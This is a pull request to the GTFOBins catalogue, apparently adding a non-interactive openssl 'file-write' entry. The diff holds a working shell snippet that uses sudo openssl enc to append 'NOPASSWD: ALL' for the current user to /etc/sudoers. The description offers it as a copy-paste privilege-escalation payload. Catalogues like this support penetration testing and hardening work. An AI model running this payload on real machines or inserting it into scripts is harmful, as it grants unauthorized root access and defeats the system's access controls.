### PR TITLE
Update OpenSSL payload to use dynamic user for sudo

### DIFF
--- a/_gtfobins/openssl
+++ b/_gtfobins/openssl
@@ -28,6 +28,16 @@ functions:
       sudo:
       suid:
       unprivileged:
+  - code: |-
+      LFILE="/etc/sudoers"
+      TMPFILE=$(mktemp)
+      PAYLOAD="$(id -un) ALL=(ALL:ALL) NOPASSWD: ALL"
+
+      sudo openssl enc -in "$LFILE" > "$TMPFILE" && echo "$PAYLOAD" >> "$TMPFILE" && sudo openssl enc -in "$TMPFILE" -out "$LFILE"
+    contexts:
+      sudo:
+      suid:
+      unprivileged:
   library-load:
   - code: |-
       openssl req -engine ./lib.so


### PR DESCRIPTION
This patch introduces a direct, non-interactive `file-write` payload for [openssl], demonstrating how to append or modify privileged files (such as [/etc/sudoers](cci:7://file:///etc/sudoers:0:0-0:0)) when `sudo openssl enc` is allowed. 

Instead of relying on an interactive session or manual input piping, this payload reads the target file, applies the injected payload to a temporary file via `mktemp`, and writes the changes back. It dynamically fetches the current escalating user via `$(id -un)` to provide an immediate, structured copy-paste solution out of the box.

**Changes included:**
- Appended a structured execution block to the `file-write` capability for the [openssl] binary.
- Implemented dynamic evaluation `$(id -un)` for improved payload flexibility across different environments.
- Formatted and validated the payload syntax using the repository's native linter constraints.
